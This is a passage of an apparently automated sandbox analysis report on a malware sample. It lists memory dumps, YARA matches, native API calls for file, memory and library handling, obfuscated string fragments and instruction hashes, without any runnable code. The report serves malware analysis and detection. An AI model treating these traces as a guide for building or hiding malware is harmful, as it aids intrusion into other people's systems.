                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011602E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011602BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0116031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 01167B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 01167BAC
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01167B7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0116728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 011672A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 011672C1
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01167294
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                                        • API String ID: 0-3854637164
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: j&vOnt$j&vOnt
                                                                                                                                        • API String ID: 0-1288808581
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 603c03c2bfdb35865987a5dd10fdaf09f681b99f7fe2d5407d75602861fbb416
                                                                                                                                        • Instruction ID: 9824efc0f0e7f7884d28719a8ce9d2f2a5617a6cdeecd2510e2f97d97565b5bc
                                                                                                                                        • Opcode Fuzzy Hash: 603c03c2bfdb35865987a5dd10fdaf09f681b99f7fe2d5407d75602861fbb416
                                                                                                                                        • Instruction Fuzzy Hash: 4642CBB0D052A8CBEB24CF54C998BDDBBB2BB45308F1485CAD14A6B381D7B55E89CF41
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a350b383ce13cf3cf99fe273b2dda38dc5e4f5fff1d0810e401e76f357f5eef8
                                                                                                                                        • Instruction ID: f8fc5fe952aeb42eabd5d619afc4b48625887a658dd442702fea488e7bf4cf45
                                                                                                                                        • Opcode Fuzzy Hash: a350b383ce13cf3cf99fe273b2dda38dc5e4f5fff1d0810e401e76f357f5eef8
                                                                                                                                        • Instruction Fuzzy Hash: 23412DB1D11219AFDB14CF99CC81EEEBBB8FF49710F10415AFA14E6240E3B19A41CBA5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                                                                        • Instruction ID: f8b0e5130e90dd6f185e6d7f8a2805599824f26dccd5d5afed97ac9e38ec65ac
                                                                                                                                        • Opcode Fuzzy Hash: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                                                                        • Instruction Fuzzy Hash: C931B8B5A00609ABDB14DF99CC41EEFB7B9EF89710F108219F919A7340D730A952CFA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                                                                        • Instruction ID: 99e53ab06d07902959dab9ceb6b67c241fe476f1b44d7a41cf5a3c9fd688e68c
                                                                                                                                        • Opcode Fuzzy Hash: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                                                                        • Instruction Fuzzy Hash: C021EAB5A00609ABDB24DF98DC41EEFB7B9EF89710F108519F91997380D730A911CBB5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                                                                        • Instruction ID: cf931751c769a09ff013e2d509af1220197209f2ad3661ecc87fcd8a99d2ab0f
                                                                                                                                        • Opcode Fuzzy Hash: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                                                                        • Instruction Fuzzy Hash: 2A1186723802057BF7219A55CC53FAB376DDF84B54F244015FB04AE3C0E6A4BD128AB5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_2b90000_oPkpFmCiYVL.jbxd
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                                                                        • API String ID: 0-606234297
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                        • API String ID: 0-392141074
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AlU$D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                        • API String ID: 0-3057419545
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$:$A$Q$R$g$i$v$z
                                                                                                                                        • API String ID: 0-4110582197
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                                                                                        • API String ID: 0-620024284
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 92q$\$g-al$g-alre$re
                                                                                                                                        • API String ID: 0-1518786521
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 5$8$9$e
                                                                                                                                        • API String ID: 0-2726392811
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $e$k$o
                                                                                                                                        • API String ID: 0-3624523832

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:2.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                        Signature Coverage:1.6%
                                                                                                                                        Total number of Nodes:443
                                                                                                                                        Total number of Limit Nodes:72
98656 8c9437 NtCreateFile 98655->98656 98659 8b89f4 98661 8b8a04 98659->98661 98660 8b89b4 98661->98660 98663 8b7290 98661->98663 98664 8b72a6 98663->98664 98666 8b72df 98663->98666 98664->98666 98667 8b7100 LdrLoadDll 98664->98667 98666->98660 98667->98666

                                                                                                                                        Control-flow Graph
                                                                                                                                        • Function range: 8a9e70-8aa239 (graph legend: Executed / Not Executed)
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: "\w$$=$(o$+$+$2$:$?H$D$DZ$T+$[$\$`$fq$g-$h$m$os$p9$v$w$|d$~v
                                                                                                                                        • API String ID: 0-1545153448
                                                                                                                                        • Opcode ID: 6edf661df15c18095d73e56fb02f93608c7cf10654a0cee5661c89b06a609b18
                                                                                                                                        • Instruction ID: df3f0c5278a37253d446b4d5ceff41b849932a417e22e94b9f8b3473ccdf6976
                                                                                                                                        • Opcode Fuzzy Hash: 6edf661df15c18095d73e56fb02f93608c7cf10654a0cee5661c89b06a609b18
                                                                                                                                        • Instruction Fuzzy Hash: A42290B0D05229CBEB28CF44C994BEDBBB1FB45308F1081D9D50DABA80D7B95A89DF45
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 008BC8B4
                                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 008BC8EF
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 008BC8FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                                                                        • Instruction ID: 417821eed31af8ec411645ad65a7e3a653fab7ec314902d731a5eb20c708eebc
                                                                                                                                        • Opcode Fuzzy Hash: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                                                                        • Instruction Fuzzy Hash: EC315271A00348ABDB20EFA4CC85FEF77BDEB45744F144459B909E6281DA74AA848BA1
                                                                                                                                        APIs
                                                                                                                                        • NtCreateFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?,?,?), ref: 008C9468
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                                                                        • Instruction ID: 187c09b4553ea180b5232f2b1237e3e4f7c794c0f3632c17a44c31d848b9e160
                                                                                                                                        • Opcode Fuzzy Hash: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                                                                        • Instruction Fuzzy Hash: 5331C2B5A01648ABDB14DF98D881EEEB7B9FF8C700F108219F918A7340D730A841CBA5
                                                                                                                                        APIs
                                                                                                                                        • NtReadFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?), ref: 008C95B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                                                                        • Instruction ID: c408079c6ccbd59264d2f5a088ca11c2506d3ffd137b0747a126713cb60e91ac
                                                                                                                                        • Opcode Fuzzy Hash: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                                                                        • Instruction Fuzzy Hash: D131E3B5A00648AFDB14DF98C881EEFB7B9EF89710F108219F918A7341D730A951CFA5
                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(008B1F5E,?,5F042D88,00000000,00000004,00003000,?,?,?,?,?,008C81DF,008B1F5E), ref: 008C9875
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                        • Opcode ID: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                                                                        • Instruction ID: c13bfdfdf6afcaa330ea7c7e3cca3981779b781e41f25b7b6707de632b35cc08
                                                                                                                                        • Opcode Fuzzy Hash: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                                                                        • Instruction Fuzzy Hash: 3A21F7B5A00609ABDB14DFA8CC41FEFB7B9EF89710F108119F958A7241D770A911CBA6
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                                                                        • Instruction ID: fcaa2081734efc9a9b520b1b617b50cb7975b5162edd836101f657010be18bca
                                                                                                                                        • Opcode Fuzzy Hash: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                                                                        • Instruction Fuzzy Hash: C4119E71A016087BD720EB68CC02FAFB7BDEF85700F108119F918A7281D670B9028BA6
                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 008C9694
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction ID: 7a55b7caea9b5f60f8f37147a72c345df9a1d3aadaa21a2b38890f09f792d2e6
                                                                                                                                        • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction Fuzzy Hash: 83E08C362002087BD620EB5DEC41F9B776CEFC6794F408419FA08A7242C6B1F91187F6
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: b332675d3d1955f6966eb73d2b861786e472008fe4d72273a203864c4a431d7e
                                                                                                                                        • Instruction ID: 7e2400f1960a915faf9a43185f942aed7eb7543329d04340306f0b007bd9d6f6
                                                                                                                                        • Opcode Fuzzy Hash: b332675d3d1955f6966eb73d2b861786e472008fe4d72273a203864c4a431d7e
                                                                                                                                        • Instruction Fuzzy Hash: 89900231609C08939140B1584984546400597E4301B55D011E0426598C8B548A565361
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 7a126aeb80353753c665c98d4ae34ce967d7ad9395d3622777eaf5bf2f344b30
                                                                                                                                        • Instruction ID: 6db4075d1784639532e7f53eb9a72dc8ae775bcad000c6d685010d427080aa91
                                                                                                                                        • Opcode Fuzzy Hash: 7a126aeb80353753c665c98d4ae34ce967d7ad9395d3622777eaf5bf2f344b30
                                                                                                                                        • Instruction Fuzzy Hash: 34900271605908C34140B1584904406600597E5301395D115A05565A4C875889559269
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 3362ffed8f79ac5f672756310306ebb603360f7766cd3854b885646eb78d2795
                                                                                                                                        • Instruction ID: 69d28247167ea741b05c7788a7cdc00b4359bed2ef1ee1c45f1e4ae91539e02d
                                                                                                                                        • Opcode Fuzzy Hash: 3362ffed8f79ac5f672756310306ebb603360f7766cd3854b885646eb78d2795
                                                                                                                                        • Instruction Fuzzy Hash: AA900271206808834105B1584514616400A87E4201B55D021E10165D4DC76589916125
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 5435dbc76b1834d229198e015be80368e2310fb7550a6d72485be74a731f3ac6
                                                                                                                                        • Instruction ID: f32b8af3f41138c29019a03bdcfdb5b5b6c27a82ac5fbc414a46c5f154da6a60
                                                                                                                                        • Opcode Fuzzy Hash: 5435dbc76b1834d229198e015be80368e2310fb7550a6d72485be74a731f3ac6
                                                                                                                                        • Instruction Fuzzy Hash: 9890023160980C83D150B1584514746000587D4301F55D011A0026698D87958B5576A1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 99293cd3ad60c871a118f9d81f59129864265a537c9058ce80bb89cad32b577e
                                                                                                                                        • Instruction ID: 3c59573f90d75c2b1e806e19961bfd974c699535c1f944a188f2e44aa93be8cd
                                                                                                                                        • Opcode Fuzzy Hash: 99293cd3ad60c871a118f9d81f59129864265a537c9058ce80bb89cad32b577e
                                                                                                                                        • Instruction Fuzzy Hash: 9B90023120984CC3D140B1584504A46001587D4305F55D011A00666D8D97658E55B661
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 5b2ab277c914a0746faecef7915d4b8602cc8b0154a4c57060499b46cd66977f
                                                                                                                                        • Instruction ID: 149630ac6132aece235c61eafaa75afe83550b4ec0a7b520842f4e3c75262f90
                                                                                                                                        • Opcode Fuzzy Hash: 5b2ab277c914a0746faecef7915d4b8602cc8b0154a4c57060499b46cd66977f
                                                                                                                                        • Instruction Fuzzy Hash: 4590023120580C83D180B158450464A000587D5301F95D015A0027698DCB558B5977A1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
